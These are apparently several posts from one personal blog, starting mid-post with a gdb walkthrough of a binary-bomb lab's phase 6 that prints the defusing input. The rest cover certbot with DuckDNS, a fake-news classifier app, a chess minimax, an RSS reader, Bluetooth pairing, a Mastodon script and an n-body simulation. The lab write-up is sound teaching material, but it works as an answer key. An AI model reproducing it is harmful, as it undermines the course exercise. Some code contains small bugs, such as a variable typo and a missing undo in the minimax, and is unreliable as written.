0x555555559120 <node6>: 0x000002da 0x00000006 0x00000000 0x00000000
0x555555559130: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559140 <userid>: 0x61767861 0x38383535 0x00000000 0x00000000
0x555555559150 <userid+16>: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559160 <userid+32>: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559170 <userid+48>: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559180 <userid+64>: 0x00000000 0x00000000 0x00000000 0x00000000
0x555555559190 <userid+80>: 0x00000000 0x00000000
(gdb)
It appears that this is a linked list. With roughly the following structure:
struct node {
int value;
int index;
struct node *next;
};
Let us convert the values into decimal:
0x000000d9 -> 217
0x000003ab -> 939
0x0000014f -> 335
0x000000a1 -> 161
0x000001b3 -> 435
0x000002da -> 730
Missing Notes
To re-arrange this linked list in descending order, we would arrange it as follows:
Node 2 -> Node 6 -> Node 5 -> Node 3 -> Node 1 -> Node 4
Since we also need to apply the transformation: 7 - x
:
(7-2) -> (7-6) -> ... -> (7-4)
Final answer: 5 1 2 4 6 3
Let us try the answer:
...
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
Good work! On to the next...
5 1 2 4 6 3
Breakpoint 1, 0x0000555555555899 in phase_6 ()
(gdb) continue
Continuing.
Congratulations! You've defused the bomb!
Your instructor has been notified and will verify your solution.
[Inferior 1 (process 1754) exited normally]
But, what about the secret phase?
]]>I have a Raspberry-Pi running a Flask app through Gunicorn (Ubuntu 20.04 LTS). I am exposing it to the internet using DuckDNS.
sudo apt update && sudo apt install certbot -y
sudo certbot certonly --manual --preferred-challenges dns-01 --email senpai@email.com -d mydomain.duckdns.org
After you accept that you are okay with you IP address being logged, it will prompt you with updating your dns record. You need to create a new TXT
record in the DNS settings for your domain.
For DuckDNS users it is as simple as entering this URL in their browser:
http://duckdns.org/update?domains=mydomain&token=duckdnstoken&txt=certbotdnstxt
Where mydomain
is your DuckDNS domain, duckdnstoken
is your DuckDNS Token ( Found on the dashboard when you login) and certbotdnstxt
is the TXT record value given by the prompt.
You can check if the TXT records have been updated by using the dig
command:
dig navanspi.duckdns.org TXT
; <<>> DiG 9.16.1-Ubuntu <<>> navanspi.duckdns.org TXT
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27592
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;navanspi.duckdns.org. IN TXT
;; ANSWER SECTION:
navanspi.duckdns.org. 60 IN TXT "4OKbijIJmc82Yv2NiGVm1RmaBHSCZ_230qNtj9YA-qk"
;; Query time: 275 msec
;; SERVER: 127.0.0.53#53(127.0.0.53)
;; WHEN: Tue Nov 17 15:23:15 IST 2020
;; MSG SIZE rcvd: 105
DuckDNS almost instantly propagates the changes but for other domain hosts, it could take a while.
Once you can ensure that the TXT record changes has been successfully applied and is visible through the dig
command, press enter on the Certbot prompt and your certificate should be generated.
As we manually generated the certificate certbot renew
will fail, to renew the certificate you need to simply re-generate the certificate using the above steps.
Example Gunicorn command for running a web-app:
gunicorn api:app -k uvicorn.workers.UvicornWorker -b 0.0.0.0:7589
To use the certificate with it, simply copy the cert.pem
and privkey.pem
to your working directory ( change the appropriate permissions ) and include them in the command
gunicorn api:app -k uvicorn.workers.UvicornWorker -b 0.0.0.0:7589 --certfile=cert.pem --keyfile=privkey.pem
Caveats with copying the certificate: If you renew the certificate you will have to re-copy the files
]]>In this tutorial we will build a fake news detecting app from scratch, using Turicreate for the machine learning model and SwiftUI for building the app
Note: These commands are written as if you are running a jupyter notebook.
To build a classifier, you need a lot of data. George McIntire (GH: @joolsa) has created a wonderful dataset containing the headline, body and whether it is fake or real. Whenever you are looking for a dataset, always try searching on Kaggle and GitHub before you start building your own
I used a Google Colab instance for training my model. If you also plan on using Google Colab then I recommend choosing a GPU Instance (It is Free) This allows you to train the model on the GPU. Turicreate is built on top of Apache's MXNet Framework, for us to use GPU we need to install a CUDA compatible MXNet package.
!pip install turicreate
!pip uninstall -y mxnet
!pip install mxnet-cu100==1.4.0.post0
If you do not wish to train on GPU or are running it on your computer, you can ignore the last two lines
!wget -q "https://github.com/joolsa/fake_real_news_dataset/raw/master/fake_or_real_news.csv.zip"
!unzip fake_or_real_news.csv.zip
import turicreate as tc
tc.config.set_num_gpus(-1) # If you do not wish to use GPUs, set it to 0
dataSFrame = tc.SFrame('fake_or_real_news.csv')
The dataset contains a column named "X1", which is of no use to us. Therefore, we simply drop it
dataSFrame.remove_column('X1')
train, test = dataSFrame.random_split(.9)
model = tc.text_classifier.create(
dataset=train,
target='label',
features=['title','text']
)
+-----------+----------+-----------+--------------+-------------------+---------------------+
| Iteration | Passes | Step size | Elapsed Time | Training Accuracy | Validation Accuracy |
+-----------+----------+-----------+--------------+-------------------+---------------------+
| 0 | 2 | 1.000000 | 1.156349 | 0.889680 | 0.790036 |
| 1 | 4 | 1.000000 | 1.359196 | 0.985952 | 0.918149 |
| 2 | 6 | 0.820091 | 1.557205 | 0.990260 | 0.914591 |
| 3 | 7 | 1.000000 | 1.684872 | 0.998689 | 0.925267 |
| 4 | 8 | 1.000000 | 1.814194 | 0.999063 | 0.925267 |
| 9 | 14 | 1.000000 | 2.507072 | 1.000000 | 0.911032 |
+-----------+----------+-----------+--------------+-------------------+---------------------+
est_predictions = model.predict(test)
accuracy = tc.evaluation.accuracy(test['label'], test_predictions)
print(f'Topic classifier model has a testing accuracy of {accuracy*100}% ', flush=True)
Topic classifier model has a testing accuracy of 92.3076923076923%
We have just created our own Fake News Detection Model which has an accuracy of 92%!
example_text = {"title": ["Middling ‘Rise Of Skywalker’ Review Leaves Fan On Fence About Whether To Threaten To Kill Critic"], "text": ["Expressing ambivalence toward the relatively balanced appraisal of the film, Star Wars fan Miles Ariely admitted Thursday that an online publication’s middling review of The Rise Of Skywalker had left him on the fence about whether he would still threaten to kill the critic who wrote it. “I’m really of two minds about this, because on the one hand, he said the new movie fails to live up to the original trilogy, which makes me at least want to throw a brick through his window with a note telling him to watch his back,” said Ariely, confirming he had already drafted an eight-page-long death threat to Stan Corimer of the website Screen-On Time, but had not yet decided whether to post it to the reviewer’s Facebook page. “On the other hand, though, he commended J.J. Abrams’ skillful pacing and faithfulness to George Lucas’ vision, which makes me wonder if I should just call the whole thing off. Now, I really don’t feel like camping outside his house for hours. Maybe I could go with a response that’s somewhere in between, like, threatening to kill his dog but not everyone in his whole family? I don’t know. This is a tough one.” At press time, sources reported that Ariely had resolved to wear his Ewok costume while he murdered the critic in his sleep."]}
example_prediction = model.classify(tc.SFrame(example_text))
print(example_prediction, flush=True)
+-------+--------------------+
| class | probability |
+-------+--------------------+
| FAKE | 0.9245648658345308 |
+-------+--------------------+
[1 rows x 2 columns]
model_name = 'FakeNews'
coreml_model_name = model_name + '.mlmodel'
exportedModel = model.export_coreml(coreml_model_name)
Note: To download files from Google Colab, simply click on the files section in the sidebar, right click on filename and then click on download
First we create a single view app (make sure you check the use SwiftUI button)
Then we copy our .mlmodel file to our project (Just drag and drop the file in the XCode Files Sidebar)
Our ML Model does not take a string directly as an input, rather it takes bag of words as an input. DescriptionThe bag-of-words model is a simplifying representation used in NLP, in this text is represented as a bag of words, without any regard for grammar or order, but noting multiplicity
We define our bag of words function
func bow(text: String) -> [String: Double] {
var bagOfWords = [String: Double]()
let tagger = NSLinguisticTagger(tagSchemes: [.tokenType], options: 0)
let range = NSRange(location: 0, length: text.utf16.count)
let options: NSLinguisticTagger.Options = [.omitPunctuation, .omitWhitespace]
tagger.string = text
tagger.enumerateTags(in: range, unit: .word, scheme: .tokenType, options: options) { _, tokenRange, _ in
let word = (text as NSString).substring(with: tokenRange)
if bagOfWords[word] != nil {
bagOfWords[word]! += 1
} else {
bagOfWords[word] = 1
}
}
return bagOfWords
}
We also declare our variables
@State private var title: String = ""
@State private var headline: String = ""
@State private var alertTitle = ""
@State private var alertText = ""
@State private var showingAlert = false
Finally, we implement a simple function which reads the two text fields, creates their bag of words representation and displays an alert with the appropriate result
Complete Code
import SwiftUI
struct ContentView: View {
@State private var title: String = ""
@State private var headline: String = ""
@State private var alertTitle = ""
@State private var alertText = ""
@State private var showingAlert = false
var body: some View {
NavigationView {
VStack(alignment: .leading) {
Text("Headline").font(.headline)
TextField("Please Enter Headline", text: $title)
.lineLimit(nil)
Text("Body").font(.headline)
TextField("Please Enter the content", text: $headline)
.lineLimit(nil)
}
.navigationBarTitle("Fake News Checker")
.navigationBarItems(trailing:
Button(action: classifyFakeNews) {
Text("Check")
})
.padding()
.alert(isPresented: $showingAlert){
Alert(title: Text(alertTitle), message: Text(alertText), dismissButton: .default(Text("OK")))
}
}
}
func classifyFakeNews(){
let model = FakeNews()
let myTitle = bow(text: title)
let myText = bow(text: headline)
do {
let prediction = try model.prediction(title: myTitle, text: myText)
alertTitle = prediction.label
alertText = "It is likely that this piece of news is \(prediction.label.lowercased())."
print(alertText)
} catch {
alertTitle = "Error"
alertText = "Sorry, could not classify if the input news was fake or not."
}
showingAlert = true
}
func bow(text: String) -> [String: Double] {
var bagOfWords = [String: Double]()
let tagger = NSLinguisticTagger(tagSchemes: [.tokenType], options: 0)
let range = NSRange(location: 0, length: text.utf16.count)
let options: NSLinguisticTagger.Options = [.omitPunctuation, .omitWhitespace]
tagger.string = text
tagger.enumerateTags(in: range, unit: .word, scheme: .tokenType, options: options) { _, tokenRange, _ in
let word = (text as NSString).substring(with: tokenRange)
if bagOfWords[word] != nil {
bagOfWords[word]! += 1
} else {
bagOfWords[word] = 1
}
}
return bagOfWords
}
}
struct ContentView_Previews: PreviewProvider {
static var previews: some View {
ContentView()
}
}
Ever since Chess24 shut down, I have been looking to find a better way to follow Chess tournaments. A few weeks ago I decided to start working on a cross-platform (macOS/iOS) app using Lichess's API. I heavily underestimated the amount of work it would take me to build something like this in SwiftUI. You not only need a library that can parse PGNs, but also a way to display those moves!
I ended up forking Sage to swift-chess-neo. I did have to patch the library to make it compatible with Swift 5 and create my own UI components using SwiftUI.
Now that I had a working Chess library that could give me all legal moves in a position, I wondered if I could write a minimax implementation.
Imagine you could look far ahead into the future and predict the perfect moves in a game for both sides. This is similar to Dr. Strange seeing all 14,000,605 alternate futures. Knowing what works and what doesn't can help you decide what you should actually play.
Using the example of Dr. Strange looking into the alternate futures, think of the Avengers winning being scored as +1, and Thanos winning being scored as -1. The Avengers would try to maximize this score, whereas Thanos would try to minimize this.
This is the idea of "minimax".
Say we are playing a game of Tic-Tac-Toe, where us winning is scored positively and our opponent winning is scored negatively. We are going to try and maximize our score. A fresh game of Tic-Tac-Toe can be represented as a 3x3 grid. Which means, if we have the first turn we have 9 possible moves.
Say we place an X in the top left corner:
-------------
| x | | |
-------------
| | | |
-------------
| | | |
-------------
Now, our oponent has 8 different moves they can play. Say they play their move in the bottom right corner
-------------
| x | | |
-------------
| | | |
-------------
| | | o |
-------------
We have 6 different moves we can play.
It would take us ages to brute force each and every combination/permutation of moves by hand. A depth-first minimax algorithm for Tick-Tac-Toe would have a max-depth of 9 (since after 9 moves from the start, we would have exhausted the search space as there would be no more available moves).
Since we cannot score an individual Tic-Tac-Toe position (technically we can), we can iterate through all moves (till we reach our max-depth) and then use these three terminal states:
function minimax(board, depth, isMaximizingPlayer):
score = evaluate(board)
# +1 Win, -1 Lose, 0 Draw
if score == 1: return score
if score == -1: return score
if boardFull(board):
return 0
if isMaximizingPlayer:
best = -infinity
for each cell in board:
if cell is empty:
place X in cell
best = maximum of (best, minimax(board, depth + 1, false))
remove X from cell
return best
else:
best = infinity
for each cell in board:
if cell is empyu:
place O in cell
best = minimum of (best, minimax(board, depth + 1, true))
return best
function evaluate(board):
if three consecutive Xs: return 1
if three consecutive 0s: return -1
return 0
function boardFull(board):
if all cells are filled: return true
else:
return false
Think of each move as a node, and each node having multiple continuations (each continuing move can be represented as a node).
This is quiet inefficient, as this will comb through all or moves! Imagine iterating through the entire search space for a complex game like Chess. It would be impossible. Therefore we use a technique called Alpha-beta pruning wherein we reduce the number of nodes that we are evaluating.
function minimax(board, depth, isMaximizingPlayer, alpha, beta):
score = evaluate(board)
# +1 Win, -1 Lose, 0 Draw
if score == 1: return score
if score == -1: return score
if boardFull(board):
return 0
if isMaximizingPlayer:
best = -infinity
for each cell in board:
if cell is empty:
place X in cell
best = maximum of (best, minimax(board, depth + 1, false, alpha, beta))
remove X from cell
alpha = max(alpha, best)
if beta <= alpha:
break
return best
else:
best = infinity
for each cell in board:
if cell is empyu:
place O in cell
best = minimum of (best, minimax(board, depth + 1, true, alpha, beta))
beta = min(beta, best)
if beta <= alpha:
break
return best
Alpha and beta are initialized as and respectively, with Alpha representing the best already explored option along the path to the root for the maximizer, and beta representing the best already explored option along the path to the root for the minimizer. If at any point beta is less than or equal to alpha, it means that the current branch does not need to be explored further because the parent node already has a better move elsewhere, thus "pruning" this node.
Thus, to implement a model you can use minimax (or similar algorithms), you need to be able to describe the following:
The chess library does a little bit of the heavy lifting by already providing methods to take care of the above requirements. Since we already have a way to find all possible moves in a position, we only need to figure out a few more functions/methods:
setGame
method to the Game
class, I use the undoMove()
methodEach piece has a different relative value. Since "capturing" the king finishes the game, the king is given a really high value.
public struct Piece: Hashable, CustomStringConvertible {
public enum Kind: Int {
...
public var relativeValue: Double {
switch self {
case .pawn: return 1
case .knight: return 3
case .bishop: return 3.25
case .rook: return 5
case .queen: return 9
case .king: return 900
}
}
...
}
...
}
We extend the Game
class by adding an evaluate function that adds up the value of all the pieces left on the board.
extension Game {
func evaluate() -> Double {
var score: Double = 0
for square in Square.all {
if let piece = board[square] {
score += piece.kind.relativeValue * (piece.color == .white ? 1.0 : -1.0)
}
}
return score
}
Since the values for black pieces are multiplied by -1 and white pieces by +1, material advantage on the board translates to a higher/lower evaluation.
Taking inspiration from the pseudocode above, we can define a minimax function in Swift as:
func minimax(depth: Int, isMaximizingPlayer: Bool, alpha: Double, beta: Double) -> Double {
if depth == 0 || isFinished {
return evaluate()
}
var alpha = alpha
var beta = beta
if isMaximizingPlayer {
var maxEval: Double = -.infinity
for move in availableMoves() {
try! execute(uncheckedMove: move)
let eval = minimax(depth: depth - 1, isMaximizingPlayer: false, alpha: alpha, beta: beta)
maxEval = max(maxEval, eval)
undoMove()
alpha = max(alpha, eval)
if beta <= alpha {
break
}
}
return maxEval
} else {
var minEval: Double = .infinity
for move in availableMoves() {
try! execute(uncheckedMove: move)
let eval = minimax(depth: depth - 1, isMaximizingPlayer: true, alpha: alpha, beta: beta)
minEval = min(minEval, eval)
if beta <= alpha {
break
}
}
return minEval
}
}
We can now get a score for a move for a given depth, we wrap this up as a public method
extension Game {
public func bestMove(depth: Int) -> Move? {
var bestMove: Move?
var bestValue: Double = (playerTurn == .white) ? -.infinity : .infinity
let alpha: Double = -.infinity
let beta: Double = .infinity
for move in availableMoves() {
try! execute(uncheckedMove: move)
let moveValue = minimax(depth: depth - 1, isMaximizingPlayer: playerTurn.isBlack ? false : true, alpha: alpha, beta: beta)
undoMove()
if (playerTurn == .white && moveValue > bestValue) || (playerTurn == .black && moveValue < bestValue) {
bestValue = moveValue
bestMove = move
}
}
return bestMove
}
}
import SwiftChessNeo
let game = try! Game(position: Game.Position(fen: "8/5B2/k5p1/4rp2/8/8/PP6/1K3R2 w - - 0 1")!)
let move = game.bestMove(depth: 5)
Of course there are tons of improvements you can make to this naive algorithm. A better scoring function that understands the importance of piece positioning would make this even better. The Chess Programming Wiki is an amazing resource if you want to learn more about this.
]]>If you want to directly open the HTML file in your browser after saving, don't forget to set CORS_PROXY=""
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>
RSS Feed
</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
</head>
<body>
<h1 align="center" class="display-1">RSS Feed</h1>
<main>
<div class="container">
<div class="list-group pb-4" id="contents"></div>
<div id="feed">
</div></div>
</main>
<script src="https://gitcdn.xyz/repo/rbren/rss-parser/master/dist/rss-parser.js"></script>
<script>
const feeds = {
"BuzzFeed - India": {
"link":"https://www.buzzfeed.com/in.xml",
"summary":true
},
"New Yorker": {
"link":"http://www.newyorker.com/feed/news",
},
"Vox":{
"link":"https://www.vox.com/rss/index.xml",
"limit": 3
},
"r/Jokes":{
"link":"https://reddit.com/r/Jokes/hot/.rss?sort=hot",
"ignore": ["repost","discord"]
}
}
const config_extra = {
"Responsive-Images": true,
"direct-link": false,
"show-date":false,
"left-column":false,
"defaults": {
"limit": 5,
"summary": true
}
}
const CORS_PROXY = "https://cors-anywhere.herokuapp.com/"
var contents_title = document.createElement("h2")
contents_title.textContent = "Contents"
contents_title.classList.add("pb-1")
document.getElementById("contents").appendChild(contents_title)
async function myfunc(key){
var count_lim = feeds[key]["limit"]
var count_lim = (count_lim === undefined) ? config_extra["defaults"]["limit"] : count_lim
var show_summary = feeds[key]["summary"]
var show_summary = (show_summary === undefined) ? config_extra["defaults"]["summary"] : show_summary
var ignore_tags = feeds[key]["ignore"]
var ignore_tags = (ignore_tags === undefined) ? [] : ignore_tags
var contents = document.createElement("a")
contents.href = "#" + key
contents.classList.add("list-group-item","list-group-item-action")
contents.textContent = key
document.getElementById("contents").appendChild(contents)
var feed_div = document.createElement("div")
feed_div.id = key
feed_div.setAttribute("id", key);
var title = document.createElement("h2");
title.textContent = "From " + key;
title.classList.add("pb-1")
feed_div.appendChild(title)
document.getElementById("feed").appendChild(feed_div)
var parser = new RSSParser();
var countPosts = 0
parser.parseURL(CORS_PROXY + feeds[key]["link"], function(err, feed) {
if (err) throw err;
feed.items.forEach(function(entry) {
if (countPosts < count_lim) {
var skip = false
for(var i = 0; i < ignore_tags.length; i++) {
if (entry.title.includes(ignore_tags[i])){
var skip = true
} else if (entry.content.includes(ignore_tags[i])){
var skip = true
}
}
if (!skip) {
var node = document.createElement("div");
node.classList.add("card","mb-3");
var row = document.createElement("div")
row.classList.add("row","no-gutters")
if (config_extra["left-column"]){
var left_col = document.createElement("div")
left_col.classList.add("col-md-2")
var left_col_body = document.createElement("div")
left_col_body.classList.add("card-body")
}
var right_col = document.createElement("div")
if (config_extra["left-column"]){
right_col.classList.add("col-md-10")
}
var node_title = document.createElement("h5")
node_title.classList.add("card-header")
node_title.innerHTML = entry.title
node_body = document.createElement("div")
node_body.classList.add("card-body")
node_content = document.createElement("p")
if (show_summary){
node_content.innerHTML = entry.content
}
node_content.classList.add("card-text")
if (config_extra["direct-link"]){
node_link = document.createElement("p")
node_link.classList.add("card-text")
node_link.innerHTML = "<b>Link:</b> <a href='" + entry.link +"'>Direct Link</a>"
if (config_extra["left-column"]){
left_col_body.appendChild(node_link)
} else {
node_content.appendChild(node_link)
}
}
if (config_extra["show-date"]){
node_date = document.createElement("p")
node_date.classList.add("card-text")
node_date.innerHTML = "<p><b>Date: </b>" + entry.pubDate + "</p>"
if (config_extra["left-column"]){
left_col_body.appendChild(node_date)
} else {
node_content.appendChild(node_date)
}
}
node.appendChild(node_title)
node_body.appendChild(node_content)
right_col.appendChild(node_body)
if (config_extra["left-column"]){
left_col.appendChild(left_col_body)
row.appendChild(left_col)
}
row.appendChild(right_col)
node.appendChild(row)
document.getElementById(key).appendChild(node)
countPosts+=1
}
}
})
if (config_extra["Responsive-Images"]){
var inputs = document.getElementsByTagName('img')
for(var i = 0; i < inputs.length; i++) {
inputs[i].classList.add("img-fluid")
}
}
})
return true
}
(async () => {
for(var key in feeds) {
let result = await myfunc(key);
}})();
</script>
<noscript>Uh Oh! Your browser does not support JavaScript or JavaScript is currently disabled. Please enable JavaScript or switch to a different browser.</noscript>
</body></html>
This was tested on a Raspberry Pi Zero W
pi@raspberrypi:~ $ bluetoothctl
[bluetooth]# agent on
[bluetooth]# default-agent
[bluetooth]# scan on
While being in bluetooth mode
[bluetooth]# pair XX:XX:XX:XX:XX:XX
To Exit out of bluetoothctl anytime, just type exit
]]>What is better than posting a blog post? Posting about your posting pipeline. I did this previously with Twitter.
mastodon.social does not support any formatting in the status posts. Yes, there are other instances which have patches to enable features such as markdown formatting, but there is no upstream support.
My website is built using a really simple static site generator I wrote in Python. Therefore, each post is self-contained in a Markdown file with the necessary metadata.
I am going to specify the path to the blog post, parse it and then publish it.
I initially planned on having a command line parser and some more flags.
I ended up using mastodon.py rather than crafting requests by hand. Each statuspost/toot call returns a statusid that can be then used as an inreplyto parameter.
For the code snippets, seeing that mastodon does not support native formatting, I am resorting to using ray-so.
I am using a bunch of regex hacks, and reading the blog post line by line. Because there is no markdown support, I append all the links to the end of the toot. For images, I upload them and attach them to the toot. The initial toot is generated based off the title and the tags associated with the post.
# Regexes I am using
markdown_image = r'(?:!\[(.*?)\]\((.*?)\))'
markdown_links = r'(?:\[(.*?)\]\((.*?)\))'
tags_within_metadata = r"tags: ([\w,\s]+)"
metadata_regex = r"---\s*\n(.*?)\n---\s*\n"
This is useful when I want to get the exact data I want. In this case, I can extract the tags from the front matter.
metadata = re.search(metadata_regex, markdown_content, re.DOTALL)
if metadata:
tags_match = re.search(r"tags: ([\w,\s]+)", metadata.group(1))
if tags_match:
tags = tags_match.group(1).split(",")
I am running akashrchandran/Rayso-API.
import requests
def get_image(code, language: str = "python", title: str = "Code Snippet"):
params = (
('code', code),
('language', language),
('title', title),
)
response = requests.get('http://localhost:3000/api', params=params)
return response.content
Even though mastodon does officially have a higher character limit than Twitter. I prefer the way threads look.
Everything does seem to work! Seeing that you are reading this on Mastodon, and that I have updated this section.
Here is the current code:
from mastodon import Mastodon
from mastodon.errors import MastodonAPIError
import requests
import re
mastodon = Mastodon(
access_token='reeeeee',
api_base_url="https://mastodon.social"
)
url_base = "https://web.navan.dev"
sample_markdown_file = "Content/posts/2022-12-25-blog-to-toot.md"
tags = []
toots = []
image_idx = 0
markdown_image = r'(?:!\[(.*?)\]\((.*?)\))'
markdown_links = r'(?:\[(.*?)\]\((.*?)\))'
def get_image(code, language: str = "python", title: str = "Code Snippet"):
params = (
('code', code),
('language', language),
('title', title),
)
response = requests.get('http://localhost:3000/api', params=params)
return response.content
class TootContent:
def __init__(self, text: str = ""):
self.text = text
self.images = []
self.links = []
self.image_count = len(images)
def __str__(self):
toot_text = self.text
for link in self.links:
toot_text += " " + link
return toot_text
def get_text(self):
toot_text = self.text
for link in self.links:
toot_text += " " + link
return toot_text
def get_length(self):
length = len(self.text)
for link in self.links:
length += 23
return length
def add_link(self, link):
if len(self.text) + 23 < 498:
if link[0].lower() != 'h':
link = url_base + link
self.links.append(link)
return True
return False
def add_image(self, image):
if len(self.images) == 4:
# will handle in future
print("cannot upload more than 4 images per toot")
exit(1)
# upload image and get id
self.images.append(image)
self.image_count = len(self.images)
def add_text(self, text):
if len(self.text + text) > 400:
return False
else:
self.text += f" {text}"
return True
def get_links(self):
print(len(self.links))
in_metadata = False
in_code_block = False
my_toots = []
text = ""
images = []
image_links = []
extra_links = []
tags = []
code_block = ""
language = "bash"
current_toot = TootContent()
metadata_regex = r"---\s*\n(.*?)\n---\s*\n"
with open(sample_markdown_file) as f:
markdown_content = f.read()
metadata = re.search(metadata_regex, markdown_content, re.DOTALL)
if metadata:
tags_match = re.search(r"tags: ([\w,\s]+)", metadata.group(1))
if tags_match:
tags = tags_match.group(1).split(",")
markdown_content = markdown_content.rsplit("---\n",1)[-1].strip()
for line in markdown_content.split("\n"):
if current_toot.get_length() < 400:
if line.strip() == '':
continue
if line[0] == '#':
line = line.replace("#","".strip())
if len(my_toots) == 0:
current_toot.add_text(
f"{line}: a cross-posted blog post \n"
)
hashtags = ""
for tag in tags:
hashtags += f"#{tag.strip()},"
current_toot.add_text(hashtags[:-1])
my_toots.append(current_toot)
current_toot = TootContent()
else:
my_toots.append(current_toot)
current_toot = TootContent(text=f"{line.title()}:")
continue
else:
if "```" in line:
in_code_block = not in_code_block
if in_code_block:
language = line.strip().replace("```",'')
continue
else:
with open(f"code-snipped_{image_idx}.png","wb") as f:
f.write(get_image(code_block, language))
current_toot.add_image(f"code-snipped_{image_idx}.png")
image_idx += 1
code_block = ""
continue
if in_code_block:
line = line.replace(" ","\t")
code_block += line + "\n"
continue
if len(re.findall(markdown_image,line)) > 0:
for image_link in re.findall(markdown_links, line):
image_link.append(image_link[1])
# not handled yet
line = re.sub(markdown_image,"",line)
if len(re.findall(markdown_links,line)) > 0:
for link in re.findall(markdown_links, line):
if not (current_toot.add_link(link[1])):
extra_links.append(link[1])
line = line.replace(f'[{link[0]}]({link[1]})',link[0])
if not current_toot.add_text(line):
my_toots.append(current_toot)
current_toot = TootContent(line)
else:
my_toots.append(current_toot)
current_toot = TootContent()
my_toots.append(current_toot)
in_reply_to_id = None
for toot in my_toots:
image_ids = []
for image in toot.images:
print(f"uploading image, {image}")
try:
image_id = mastodon.media_post(image)
image_ids.append(image_id.id)
except MastodonAPIError:
print("failed to upload. Continuing...")
if image_ids == []:
image_ids = None
in_reply_to_id = mastodon.status_post(
toot.get_text(), in_reply_to_id=in_reply_to_id, media_ids=image_ids
).id
Not the best thing I have ever written, but it works!
]]>This post requires JavaScript to be viewed properly :(
Adapted from the Numerics Tutorial - kirklong/ThreeBodyBot. The Julia code has been rewritten in JavaScript.
Workflow:
To workaround memory issues, the simulations are only run on-demand when the user clicks the respective button. Scroll down to the bottom of the page to see the results.
The n-body problem is a classic puzzle in physics (and thus astrophysics) and mathematics that deals with predicting the motion of multiple celestial objects that interact with each other through gravitational forces.
Imagine you are observing a cosmic dance between multiple celestial bodies, all tugging on one another as they move through space. The n-body problem aims to understand and predict the paths of these objects as they move through space.
When n=2
, i.e we have only two objects, say the Earth and the Moon, we can easily apply Newtonian physics to predict their motion. However, when n>2
, the problem becomes much more difficult to solve analytically.[1] This is because each object feels the gravitational pull from all other objects, and thus the equations of motion become coupled and non-linear.
As the number of objects increases, finding an exact solution becomes impossible, and we rely on analytical approximations.
If we want to create a n-body simulation in our browser, we need to figure out how we are going to visualise the motion of the objects. There are a few ways to do this, but the easiest is to use Plotly.js, a JavaScript library for creating interactive graphs. (An alternative is to use the HTML5 canvas element).
/*
* Earth - Sun Orbit Plot
* Taken from Numerics tutorial
*/
const G = 6.67e-11;
const Msun = 2e30;
const AU = 1.5e11;
const v0 = Math.sqrt(G * Msun / AU); // SI
function dR(r, v) {
const dv = [-G * Msun / Math.pow(r[0] ** 2 + r[1] ** 2, 3 / 2) * r[0], -G * Msun / Math.pow(r[0] ** 2 + r[1] ** 2, 3 / 2) * r[1]];
const dr = [...v];
return [dr, dv];
}
// initialize system
let r = [-AU, 0];
const theta = Math.atan2(r[1], r[0]);
let v = [-v0 * Math.sin(theta), v0 * Math.cos(theta)];
const t = Array.from({ length: 1001 }, (_, i) => i / 100 + 0.0); // years
const yearSec = 365 * 24 * 3600;
const dt = (t[1] - t[0]) * yearSec; // s
const x4Plot = Array.from({ length: t.length }, () => 0);
const y4Plot = Array.from({ length: t.length }, () => 0);
// integrate using RK4!
for (let i = 0; i < t.length; i++) {
const k1 = dR(r, v).map(x => x.map(y => y * dt));
const k2 = dR(r.map((ri, j) => ri + k1[0][j] / 2), v.map((vi, j) => vi + k1[1][j] / 2)).map(x => x.map(y => y * dt));
const k3 = dR(r.map((ri, j) => ri + k2[0][j] / 2), v.map((vi, j) => vi + k2[1][j] / 2)).map(x => x.map(y => y * dt));
const k4 = dR(r.map((ri, j) => ri + k3[0][j]), v.map((vi, j) => vi + k3[1][j])).map(x => x.map(y => y * dt));
r = r.map((ri, j) => ri + (k1[0][j] + 2 * k2[0][j] + 2 * k3[0][j] + k4[0][j]) / 6);
v = v.map((vi, j) => vi + (k1[1][j] + 2 * k2[1][j] + 2 * k3[1][j] + k4[1][j]) / 6);
x4Plot[i] = r[0];
y4Plot[i] = r[1];
}
// make data for plot
var sun = { x: 0, y: 0 };
const earth = { x: x4Plot.map(x => x / AU), y: y4Plot.map(y => y / AU) };
const circle = { x: Array.from({ length: 1001 }, (_, i) => Math.cos(i / 100 * 2 * Math.PI)), y: Array.from({ length: 1001 }, (_, i) => Math.sin(i / 100 * 2 * Math.PI)) };
This code simulates the orbit of Earth around the Sun, using a numerical method called the Runge-Kutta 4th order (RK4) method.
First, we define some constants:
G: the gravitational constant (6.67e-11 N m²/kg²) Msun: the mass of the Sun (2e30 kg) AU: an astronomical unit, the average distance between Earth and Sun (1.5e11 m) v0: the initial velocity of Earth, calculated from its distance to the Sun Next, the function dR takes the position r and velocity v of Earth as input and returns the rate of change in position (dr) and the rate of change in velocity (dv) using the gravitational force formula.
We then initialize the position r and velocity v of Earth, and create an array t that represents time in years, divided into 1001 steps. We also define yearSec as the number of seconds in a year and dt as the time step in seconds.
Now, we integrate the Earth's motion using the RK4 method. For each time step, we calculate the rates of change for position and velocity (k1, k2, k3, k4) and update Earth's position and velocity based on these. We store the updated position in x4Plot and y4Plot.
Finally, we normalize the position data by dividing it by the astronomical unit (AU) to make it more visually meaningful. We also create a circle for reference, which represents a perfect circular orbit. The code ends with the data for the Sun's position, Earth's orbit, and the reference circle ready to be plotted.
Now that we have the data for the Sun's position, Earth's orbit, and the reference circle, we can plot them using Plotly.js.
let traceSun = {
x: [sun.x],
y: [sun.y],
mode: "markers",
marker: {
symbol: "star",
size: 10,
color: "gold",
},
name: "Sun",
};
const traceEarth = {
x: earth.x,
y: earth.y,
mode: "lines",
line: {
color: "white"
},
name: "Earth",
};
const traceOrbit = {
x: circle.x,
y:circle.y,
mode: "lines",
line: {
